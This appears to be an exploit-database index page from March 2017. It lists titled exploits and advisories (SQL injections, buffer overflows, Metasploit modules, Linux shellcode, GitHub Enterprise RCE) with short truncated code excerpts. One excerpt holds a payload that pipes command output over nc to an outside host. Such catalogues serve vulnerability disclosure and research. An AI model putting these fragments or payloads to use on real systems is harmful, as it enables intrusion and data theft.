Microsoft GDI+ - 'gdiplus!GetRECTSForPlayback' Out-of-Bounds Read (MS17-013)
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1042 We have encountered a crash in the Windows GDI+ library, in the gdiplus!GetRECTSForPlayback function, while trying to display a malformed EMF+ image file: --- 6be8.6f1c: Access violation - code c0000005 first chance First chan...
Microsoft Color Management Module 'icm32.dll' - 'icm32!Fill_ushort_ELUTs_from_lut16Tag' Out-of-Bounds Read (MS17-013)
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1052 We have encountered a crash in the Windows Color Management library icm32.dll, in the icm32!Fill_ushort_ELUTs_from_lut16Tag function, while trying to display a TIFF image with a malformed embedded color profile: --- 7c1c.93b0:...
Microsoft Windows - Uniscribe Heap Out-of-Bounds Read in 'USP10!ScriptApplyLogicalWidth' Triggered via EMF (MS17-013)
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1053 We have encountered a crash in the Windows Uniscribe user-mode library, in the USP10!ScriptApplyLogicalWidth function, while trying to display a malformed EMF file: --- 920c.9190: Access violation - code c0000005 first chance...
Microsoft Color Management Module 'icm32.dll' - 'icm32!LHCalc3toX_Di16_Do16_Lut8_G32' Out-of-Bounds Read (MS17-013)
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1054 We have encountered a crash in the Windows Color Management library icm32.dll, in the icm32!LHCalc3toX_Di16_Do16_Lut8_G32 function, while trying to translate colors based on a malformed color profile file: --- 61e4.8620: Access...
D-Link DGS-1510 - Multiple Vulnerabilities
================ get-user-info.py ================ import re import os.path import urllib2 import base64 import gzip import zlib from StringIO import StringIO from io import BytesIO def makerequests: """Calls request functions sequentially.""" response = None responseText = None...
Microsoft Internet Explorer 11 - 'textarea.defaultValue' Memory Disclosure (MS17-006)
function run var textarea = document.getElementById"textarea"; var frame = document.createElement"iframe"; textarea.appendChildframe; frame.contentDocument.onreadystatechange = eventhandler; form.reset; function eventhandler document.getElementById"textarea".defaultValue = "foo"; alert"Text value...
Mozilla Firefox - 'table' Use-After-Free
body display: table function freememory try fuzzPriv.forceGC; catcherr alert'Please install domFuzzLite3'; function go var s = document.getSelection; window.find"1",true,false,true,false; s.modify"extend","forward","line"; document.body.appenddocument.createElement"table"; freememory uZ1CqnaASOkr...
Microsoft Windows - Uniscribe Font Processing Out-of-Bounds Read in usp10!otlChainRuleSetTable::rule (MS17-011)
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1019 We have encountered a crash in the Windows Uniscribe user-mode library, in the usp10!otlChainRuleSetTable::rule function, while trying to display text using a corrupted TTF font file: --- 4464.11b4: Access violation - code...
Linux/x86 - File Reader Shellcode (54 Bytes)
Linux/x86 - File Reader Shellcode (54 Bytes). Shellcode exploit for Lin_x86 platform ;================================================================================ ; The MIT License ; ; Copyright (c) ; ; Permission is hereby granted, free of charge, to any person obtaining a copy ; of this software...
Secure Download Links - 'dc' SQL Injection
Exploit Title: Secure Download Links - SQL Injection Google Dork: N/A Date: 19.03.2017 Vendor Homepage: http://sixthlife.net/ Software: http://sixthlife.net/product/secure-download-links/ Demo: http://www.satyamtechnologies.net/secdown/example.php Version: N/A Tested on: Win7 x64, Kali Linux x64...
FTPShell Server 6.56 - 'ChangePassword' Buffer Overflow
print ''' Created: ScrR1pTK1dd13 Name: Greg Priest Mail: [email protected] Exploit Title: FTPShell Server 6.56 ChangePassword DEP off BufferOverflow 0Day Date: 2017.03.19 Exploit Author: Greg Priest Version: FTPShell Server 6.56 Tested on: Windows7 x64 HUN/ENG Enterprise ''' overflow...
HttpServer 1.0 - Directory Traversal
Exploit Title: HttpServer 1.0 DolinaySoft Directory Traversal Date: 2017-03-19 Exploit Author: malwrforensics Software Link: http://www.softpedia.com/get/Internet/Servers/WEB-Servers/HttpServer.shtmldownload Version: 1.0 Tested on: Windows Exploiting this issue will allow an attacker to view...
iFdate Social Dating Script 2.0 - SQL Injection
Exploit Title: iFdate Social Dating Script v2.0 - SQL Injection Google Dork: N/A Date: 18.03.2017 Vendor Homepage: http://turnkeycentral.com/ Software: http://turnkeycentral.com/scripts/social-dating-script/ Demo: http://demo.turnkeycentral.com/ifdate/index.php Version: 2.0 Tested on: Win7 x64,...
DIGISOL DG-HR1400 1.00.02 Wireless Router - Privilege Escalation
Title: ====== Cookie based privilege escalation in DIGISOL DG-HR1400 1.00.02 wireless router. CVE Details: ============ CVE-2017-6896 Reference: ========== https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6896 https://vuldb.com/sv/?id.97954...
Omegle Clone - SQL Injection
Exploit Title: Omegle Clone - SQL Injection Google Dork: N/A Date: 18.03.2017 Vendor Homepage: http://turnkeycentral.com/ Software: http://www.turnkeycentral.com/scripts/omegle-clone/ Demo: http://demo.turnkeycentral.com/omegleclone/ Version: N/A Tested on: Win7 x64, Kali Linux x64 Exploit Author...
AXIS Communications - Cross-Site Scripting / Content Injection
0RWELLL4BS security advisory olsa-2015-8258 PGP: 79A6CCC0 @orwelllabs Advisory Information ==================== - Title: ImagePath Resource Injection/Open script editor - Vendor: AXIS Communications - Research and Advisory: Orwelllabs - Class: Improper Input Validation CWE-20 - CVE Name:...
AXIS (Multiple Products) - Cross-Site Request Forgery
0RWELLL4BS security advisory olsa-CVE-2015-8255 PGP: 79A6CCC0 @orwelllabs Advisory Information ==================== - Title: Cross-Site Request Forgery - Vendor: AXIS Communications - Research and Advisory: Orwelllabs - Class: Session Management control CWE-352 - CVE Name: CVE-2015-8255 - Affecte...
Departmental Store Management System 1.2 - SQL Injection
Exploit Title: Pasal - Departmental Store Management System v1.2 - SQL Injection Google Dork: N/A Date: 17.03.2017 Vendor Homepage: http://webstarslab.com Software : http://webstarslab.com/products/pasal-departmental-store-management-system/ Demo:...
FTPShell Client 6.53 - 'Session name' Local Buffer Overflow
print ''' Created: ScrR1pTK1dd13 Name: Greg Priest Mail: [email protected] Exploit Title: FTPShell Client 6.53 Session name BufferOverflow Date: 2017.03.17 Exploit Author: Greg Priest Version: FTPShell Client 6.53 Tested on: Windows7 x64 HUN/ENG Professional ''' a = "A" * 460 b =...
Linux/x86 - Encoded exceve("/bin/sh") Shellcode (44 Bytes)
Linux/x86 - Encoded exceve("/bin/sh") Shellcode (44 Bytes). Shellcode exploit for Lin_x86 platform ;================================================================================ ; The MIT License ; ; Copyright (c) ; ; Permission is hereby granted, free of charge, to any person obtaining a copy ; of...
Linux/x86 - Bind Shell Shellcode (42 bytes)
Linux/x86 - Bind Shell Shellcode (42 bytes). Shellcode exploit for Lin_x86 platform / SuperSmallBindShell 2 x86 Date: 17.03.2017 This shellcode will listen on a random port and show you how deep the rabbit hole goes. Please note that ports below 1024 require high privileges to bind! Shellcode Author:...
SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "SolarWind LEM Default SSH Password Remote Code Execution", 'Description' = %q This module exploits the default credentials of SolarWind LEM. A men...
Cisco IOS 12.2 < 12.4 / 15.0 < 15.6 - Security Association Negotiation Request Device Memory
#!/usr/bin/python # -*- coding: utf8 -*- import socket from scapy.all import * # --------------------------- # Requirements: $ sudo pip install scapy # --------------------------- conf.verb = 0 RCVSIZE = 2548 TIMEOUT = 6 payload = '5\xc7\x07\xdf\xed\xef\x00\x00\x00\x00\x00\x00\x00\x00\x01\x10\x02' payload +=...
Oracle Knowledge Management 12.1.1 < 12.2.5 - XML External Entity Leading To Remote Code Execution
SSD Advisory – Oracle Knowledge Management XXE Leading to a RCE Vulnerability Summary The following advisory describes an Information Disclosure found in Oracle Knowledge Management version 8.5.1. By enabling searches across a wide variety of sources, Oracle's InQuira knowledge management products...
Microsoft Windows DVD Maker 6.1.7 - XML External Entity Injection
Credits: John Page AKA hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-DVD-MAKER-XML-EXTERNAL-ENTITY-FILE-DISCLOSURE.txt + ISR: ApparitionSec Vendor: ================= www.microsoft.com Product: ================= Windows DVD Maker...
Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free
f.onload = null; for var x in window if whitelist.indexOfx != -1 continue; try window.lookupGetterx.callf.contentWindow; logx; catch e ; f.src = "https://abc.xyz/"; document.body.appendChildf; And after some plays, finally reached an UAF condition. PoC is attached. RIP will jump into the freed JI...
CommVault Edge 11 SP6 - Stack Buffer Overflow (PoC)
import socket import binascii import time import struct s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(1) s.connect(("10.101.0.85", 8400)) def sr(p=None, r=None): if p: print "sending %d bytes: %s " % (len(p)/2, p) payl = binascii.a2b_hex(p) s.send(payl) if r: data = s.recv(1024*2) print "received %d...
Cerberus FTP Server 8.0.10.3 - 'MLST' Buffer Overflow (PoC)
Title: Cerberus FTP Server 8.0.10.3 – 'MLST' Remote Buffer Overflow + Credits / Discovery: Nassim Asrir + Author Contact: [email protected] || https://www.linkedin.com/in/nassim-asrir-b73a57122/ + Author Company: Henceforth + CVE: CVE-2017-6880 Vendor: ===============...
WordPress Plugin Membership Simplified 1.58 - Arbitrary File Download
import requests import string import random from urlparse import urlparse print "---------------------------------------------------------------------" print "Wordpress Plugin Membership Simplified v1.58 - Arbitrary File Download\nDiscovery: Larry W. Cashdollar\nExploit Author: Munir...
Cobbler 2.8.0 - (Authenticated) Remote Code Execution
!/usr/bin/python """ Exploit title: Cobbler 2.8.x Authenticated RCE. Author: Dolev Farhi Contact: dolevf at protonmail.com @hack6tence Date: 03-16-2017 Vendor homepage: cobbler.github.io Software version: v.2.5.160805 Software Description ===================== Cobbler is a Linux installation serv...
Joomla! Component Vik Appointments 1.5 - SQL Injection
Exploit Title: Joomla! Component Vik Appointments v1.5 - SQL Injection Google Dork: inurl:index.php?option=com_vikappointments Date: 15.03.2017 Vendor Homepage: https://extensionsforjoomla.com/ Software : https://extensionsforjoomla.com/livedemo/vikappointments/ Demo:...
Joomla! Component Vik Rent Items 1.3 - SQL Injection
Exploit Title: Joomla! Component Vik Rent Items v1.3 - SQL Injection Google Dork: inurl:index.php?option=com_vikrentitems Date: 15.03.2017 Vendor Homepage: https://extensionsforjoomla.com/ Software : https://extensionsforjoomla.com/components-modules/vik-rent-items-e4j Demo:...
Joomla! Component Vik Rent Car 1.11 - SQL Injection
Exploit Title: Joomla! Component Vik Rent Car v1.11 - SQL Injection Google Dork: inurl:index.php?option=com_vikrentcar Date: 15.03.2017 Vendor Homepage: https://extensionsforjoomla.com/ Software : https://extensionsforjoomla.com/components-modules/vik-rent-car-e4j Demo:...
PCAUSA Rawether (ASUS PCE-AC56 WLAN Card Utilities Windows 10 x64) - Local Privilege Escalation
Exploit Title: PCAUSA Rawether for Windows local privilege escalation Date: 2017-03-15 Exploit Author: ReWolf Vendor Homepage: original vendor website doesn't exist anymore Version: too many Tested on: Windows 10 x64 TH2, RS1 Rawether for Windows is a framework that facilitates communication...
ASUS PCE-AC56 WLAN Card Utilities (PCAUSA Rawether Windows 10 x64) - Local Privilege Escalation
ASUS PCE-AC56 WLAN Card Utilities (PCAUSA Rawether Windows 10 x64) - Local Privilege Escalation. Local exploit for Win_x86-64 platform Rawether for Windows is a framework that facilitates communication between an application and the NDIS miniport driver. It's produced by a company named Printing...
Microsoft Windows - COM Session Moniker Privilege Escalation (MS17-012)
/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1021 Windows: COM Session Moniker EoP Platform: Tested on Windows 10 14393, Server 2012 R2 Class: Elevation of Privilege Summary: When activating an object using the session moniker the DCOM activator doesn’t check if the current...
Adobe Flash - Metadata Parsing Out-of-Bounds Read
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1005 The attached file causes an out-of-bounds read when its metadata is parsed Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41608.zip...
Adobe Flash - MovieClip Attach init Object Use-After-Free
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1006 The attached file causes a use-after-free in attaching a MovieClip and applying the init object. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41609.zip...
Adobe Flash - ATF Thumbnailing Heap Overflow
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1015 The attached file causes an overflow in heap thumbnailing. To reproduce, place both attached files on a server and visit http://127.0.0.1/LoadImage.swf?img=thumb2.atf Proof of Concept:...
Adobe Flash - ATF Planar Decompression Heap Overflow
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1016 The attached file causes heap corruption when decompressing a planar block. To reproduce the issue, put both attached files on a server and visit: http://127.0.0.1/LoadImage.swf?img=planar1.atf Proof of Concept:...
Adobe Flash - AVC Header Slicing Heap Overflow
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1017 There is a heap overflow in AVC header slicing. To reproduce the issue, put the attached files on a server and visit http://127.0.0.1/LoadImage.swf?img=slice.flv Proof of Concept:...
IBM WebSphere - RCE Java Deserialization (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule "IBM WebSphere RCE Java Deserialization Vulnerability", 'Description' = %q This module exploits a vulnerability in IBM's WebSphe...
Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - 'Jakarta' Multipart Parser OGNL Injection (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule 'Apache Struts Jakarta Multipart Parser OGNL Injection', 'Description' = %q This module exploits a remote code execution...
GitHub Enterprise 2.8.0 < 2.8.6 - Remote Code Execution
#!/usr/bin/ruby require "openssl" require "cgi" require "net/http" require "uri" SECRET = "641dd6454584ddabfed6342cc66281fb" puts ' . . ' puts ' \ | | | ' puts '/ \\ / /\ \ | | | | | / \ ' puts '\ / /\ \ / /// \ ' puts ' / / / / / ' puts '' puts "github Enterprise RCE exploit" puts...
Sitecore CMS 8.1 Update-3 - Cross-Site Scripting
Exploit Title: Stored Cross Site Scripting (XSS) in Sitecore Experience Platform 8.1 Update-3 Date: March 15, 2017 Exploit Author: Pralhad Chaskar Vendor Homepage: http://www.sitecore.net/en Version: 8.1 rev. 160519 Tested on: Sitecore Experience Platform 8.1 Update-3, i.e. 8.1 rev. 160519 CVE :...
GitHub Enterprise < 2.8.7 - Remote Code Execution
#!/usr/bin/python from urllib import quote ''' set up the marshal payload from IRB code = "id | nc orange.tw 12345" p "\x04\x08" + "o"+":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy"+"\x07" + ":\x0E@instance" + "o"+":\x08ERB"+"\x07" + ":\x09@src" + Marshal.dumpcode2..-1 +...
Microsoft Windows - 'LoadUvsTable()' Heap Buffer Overflow
Date: 15-03-2017 Author: Hossein Lotfi https://twitter.com/hosselot CVE: CVE-2016-7274 1. Description An integer overflow error within the "LoadUvsTable" function of usp10.dll can be exploited to cause a heap-based buffer overflow. Full analysis is available at:...
Joomla! Component Simple Membership 3.3.3 - 'userId' SQL Injection
Exploit Title: Joomla! Component Simple Membership v3.3.3 - SQL Injection Google Dork: inurl:index.php?option=com_simplemembership Date: 14.03.2017 Vendor Homepage: http://ordasoft.com/ Software :...
Joomla! Component Advertisement Board 3.0.4 - 'id' SQL Injection
Exploit Title: Joomla! Component Advertisement Board v3.0.4 - SQL Injection Google Dork: inurl:index.php?option=com_advertisementboard Date: 14.03.2017 Vendor Homepage: http://ordasoft.com/ Software :...
APNGDis 2.8 - 'chunk size descriptor' Heap Buffer Overflow
Exploit Title: APNGDis chunk size descriptor Buffer Overflow Date: 14-03-2017 Exploit Author: Alwin Peppels Vendor Homepage: http://apngdis.sourceforge.net/ Software Link: https://sourceforge.net/projects/apngdis/files/2.8/ Version: 2.8 Tested on: Linux Debian / Windows 7 CVE : CVE-2017-6192...